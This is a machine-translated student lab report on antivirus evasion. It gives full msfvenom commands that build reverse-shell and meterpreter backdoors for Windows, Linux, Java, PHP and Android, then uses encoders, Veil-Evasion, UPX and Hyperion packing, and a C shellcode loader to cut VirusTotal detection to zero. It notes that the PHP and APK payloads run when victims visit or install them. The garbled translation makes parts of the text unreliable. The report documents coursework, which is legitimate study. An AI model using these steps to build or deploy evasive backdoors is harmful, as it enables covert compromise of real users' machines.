20,175,304 Chao-Yin 2019-2020-3 "Network Warfare Technology" Exp3 free to kill Principles and Practice

20,175,304 Chao-Yin 2019-2020-3 "Network Warfare Technology" Exp2 back door Principles and Practice

1 Basics

Basics reference section to avoid killing the principles and practice guidance

1.1 malware detection mechanism

1.1.1 signature-based detection

- signature is for some one or more pieces of data. If an executable file (or run other libraries, scripts, etc.) containing such data is considered malicious code.

• AV software vendors do is try to gather the most complete, the latest signature database. Therefore, it is important to update anti-virus software. Outdated signature database is of no use libraries.

1.1.2 heuristic malware detection

Heuristic Heuristic , according to some one-sided feature to infer. Usually because of the lack of accurate determination basis.

• advantage:
  • To detect 0-day malware
  • It has some versatility
• Disadvantages:
  • Real-time monitoring of system behavior, spending a little more
  • No signature-based high accuracy

1.1.3 behavior-based malware detection

Behavior-based detection is equivalent to a heuristic or heuristics joined behavior monitoring.

1.2 Free Technology Review (Evading AV) kill

Overall techniques are:

• Change signature

  • Only EXE
    • Packers: Compression encryption shell casing
  • There shellcode (like Meterpreter)
    • Encoded with encode
    • Recompiled executable file-based payload
  • Source code
    • Rewritten in another language and then compiled (veil-evasion)

• Change behavior

  • Mode of operation
  • RAM-based operation
  • Reduce the modification of the system
  • Join confuse the role of the normal function of the code
  • communication method
    • Try to use a rebound connection
    • Use the tunnel technology
    • Encrypted communications data

• Unconventional Methods

  • Using a vulnerable application as a back door, as write attack code into the MSF.
  • Use social class attack, trick goal off the AV software.
  • Handmade a malicious software

• The idea of ​​leaving the back door like this:

  • You write a vulnerable software, open a service port. The software itself is no problem. Then if the port is attacked, you can get control of the system.
    • By such a memory-resident meterpreter payload, AV software difficult to be detected.
    • Such a small flaw program we also have to do their own attack it was still very easy.
  • Of course the best way, or hand-built from scratch yourself a compiled, there is no universal tool features, AV software will kill not out.
    • Of course, to build from scratch is quite difficult, but we can use the existing payload Metasploit to create semi-manual, with good results

2 Experimental Procedure

2.0 recognition rate benchmark

In the second experiment has been generated backdoor 20175304_backdoor.exe, msfvenom meterpreter generated directly executable file, the detection rate was 57/72, i.e., 72 scan engine 57 has identified it as a virus. We take this as a reference, look through the application process to avoid killing in Virustotal recognition on the high or low.

2.1 Proper use msf encoder

Step1: Enter the following code, generating met-encoded.exea file, and backdoor encoding (encoding a)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b '\x00' LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded.exe

File generation Screenshot:

Copy the file to Windows, anti-virus software will prompt the file is a Trojan file:

With Virustotal identifying the file, the detection rate was 56/72, no coding is reduced than the previous point, but this document can be isolated or

Step2: Enter the following code, generating met-encoded10.exea file, and backdoor encoding (encoding ten times)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b '\x00' -i 10 LHOST=192.168.62.134 LPORT=5304 -f exe > met-encoded.exe

Copy the file to Windows, antivirus software will also prompt the file is a Trojan files, and delete.

After you manually restore files using Virustotal recognize the file, the detection rate was 57/72, rise, not fall, and even multi-coding instructions several times to avoid killing effect and will not improve, this approach is useless.

There are two main reasons:

• AV vendor research is encoder itself, shikata_ga_nai there will always be decoded (decoder stub) part needs to be added in the exe, pegged to this part of it.
• msfvenom exe will generate a fixed template, it generates all the exe, if the default parameters or template, there are certain fixed characteristics. So, in general AV vendors will be generated signature template for their use, so that once and for all solve all msfvenom generate malicious code. That if you use msfvenom free to kill, it is necessary to use a template native.

Other documents, such as generation 2.2 msfvenom jar or the like

2.2.1 generated back door under Linux

And Windows operating method similar to the back door, enter the following code generation trojan horse.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_linux_backdoor

The only difference with the windows system is produced under linux Trojans need to use the command chmod +x 程序名given executable permissions. Use execution ./程序名can be.

Linux does not come out the back door under the recognition in Virustotal in:

2.2.2 generated Java backdoor

Java program in windows and under linux can come into force. Use the following code generation Trojan files.

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_java_backdoor.jar

Detection rate jar files 35/74

2.2.3 generated PHP backdoors

Use the following code generation Trojan files, the generated php file into the site above, when others visit will be executed.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_php_backdoor.php

Detection rate php file 3/73

Android 2.2.4 generated backdoor

Trojan code generation using the following documents, in this case in the form of Trojan apk installation package, the package user to click on this installation, will be performed.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 x> 20175304_android_backdoor.apk

Detection rate apk file 26/74

2.3 veil

2.3.1 veil of the installation process and problem solving

Enter the sudo apt-get install veilinstallation veil, because it is installed before the test, so there is no process shots.

2.3.2 veil generating backdoor

step1: use evasion input commands input into the veil-evasion and use c / meterpreter / rev_tcp.py configuration interface

Step2: input set LHOST 192.168.62.134and set LPORT 5304respectively connected to the rebound provided IP address and port number. You can enter optionsthe results of the review settings

Step3: Enter the generategenerated files, follow the prompts to enter the file name: 20175304_veil_backdoorand then you can see the file storage directory.

Step4: the generated file Virustotal recognition, the detection rate is 55/72.

2.4 packers tools

Technically divided into partial shells:

• Compression Shell
  • Reducing the volume of applications, such as ASPack, UPX
• Encryption shell
  • Copyright protection, anti-tracking. As ASProtect, Armadillo
• virtual machine
  • Compiled by similar means, application instructions into the instruction set of their own design. As VMProtect, Themida

2.4.1 Compression Shell UPX

Entryupx 20175304_backdoor.exe -o 20175304_backdoor_upxed.exe

After copying the files to Windows, antivirus software immediately killing the file.

With Virustotal recognition, the detection rate is 54/72.

2.4.2 Encryption shell Hyperion

Enter wine hyperion.exe -v 20175304_backdoor_upxed.exe 20175304_backdoor_upxed_Hyperion.exethe file encryption plus shell.

With Virustotal recognition, the detection rate is 48/73.

2.5 program using C + shellcode

Step1: Use the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.62.134 LPORT=5304 -f cto generate some shellcode.

Step2: Create a file callshellcode.c, and then unsigned char buf[]assign to it.

Step3: Enter i686-w64-mingw32-g++ callshellcode.c -o 20175304.exe, compile this file as an executable file.

Step4: with Virustotal recognition, the detection rate is 41/78.

2.6 Other classroom does not describe the method

Step1: Input sudo veiland then enter the following use evasioninto the free kill platform:

From the chart you can see the input listcan be viewed payloads available, then enter listcheck:

You can see the number 7 is a teacher in guiding the payload used in the book, use the C language, here I am going to use a different payload, using Python.

Step2: Enter use python/meterpreter/rev_tcp.pyto enter the configuration page, you can see now options or default, so we need to set some options.

Step3: input set LHOST 192.168.62.134and set LPORT 5304respectively connected to the rebound provided IP address and port number. You can enter optionsthe results of the review settings

Step4: Enter the generategenerated files, follow the prompts to enter the file name: 20175304_veil_backdoor2

Step5: When generating a file, the system will ask 如何创建负载可执行文件？, I chose 2 Py2Exe, then you can see the file storage directory.

Step6: Copy runme.bat files to Windows, and with Virustotal recognition, the detection rate is 0/57.

2.7 By combining the application of various techniques to achieve malicious code to avoid killing

2.6 can be seen in the veil generate backdoor file, Python language is used to avoid killing function can be realized, even detection rate 0.

On the basis of just runme.bat files plus compression and encryption shell casing to achieve free to kill.

• Computer environment: Windows7
• Antivirus software: Tencent Computer Manager
• Soft kill version: 13.5.20513.228
• Killing Time: 2020.03.27

2.8 Measured with another computer, in the case of soft kill on, and run back to even succeed, kill the soft version marked with the name of the computer

• Computer environment: Windows7
• Antivirus software: Tencent Computer Manager
• Soft kill version: 13.5.20513.228
• Killing Time: 2020.03.27

Problems encountered 3 experiments

3.1 plus encryption shell, can not find the /usr/share/veil-evasion/tools/hyperiondirectory

Solution: Referring blog , as follows:

• First install mingw-w64:apt-get install mingw-w64
• Get the zip file: Download link
• Unzip the file:unzip Hyperion-2.2.zip
• The first line in the Makefile changedCC =i686-w64-mingw32-gcc
• make
• After the make files you can see hyperion.exe

3.2 Use virustotal, often Caton, can not quit.

Workaround: Use the light version, use smooth.

4 questions answered

4.1 How to kill soft is detected malicious code?

It can be divided into the following two:

• The signature detection: AV manufacturers have malicious code signature library data is stored in some of the features. If a file is killing the software detected some of his characteristic data is a characteristic feature of the data in the database, then the file is considered to contain malicious code.
• Heuristic detection: If a behavior is a software looks like malware, then we put it as a malicious software.

4.2 is free to kill what to do?

Not slain soft detected, penetration testing technology required for use.

4.3 The basic method to avoid killing what?

From the perspective of being detected, the malicious code will be found because the signatures or behavior, then there is a method to avoid killing three categories:

• Unconventional Methods: handmade, social class attack.

• Changing the signature: msf coding this experiment operations, veil, packers, shellcode belong to a different signature.

• Change behavior: Use a rebound connection, tunneling, encryption, data communications and so on.

4.4 open soft kill can absolutely prevent malicious computer code?

Can not, in some way changed by malicious code signatures, then the malware anti-virus software will not be found, but that does not mean that the file is safe, no viruses.

5. Experimental Experience

The experimental operation process is relatively long. Doing to avoid killing operation of several experiments before the discovery of content or are not familiar with. After the teacher's explanation and hopes to own more hands-on practice and gradually deepen understanding and memory.

6 References

Free to kill Principles and Practice

Backdoor Principles and Practice

Use mingw-w64 compilation of Hyperion in Kali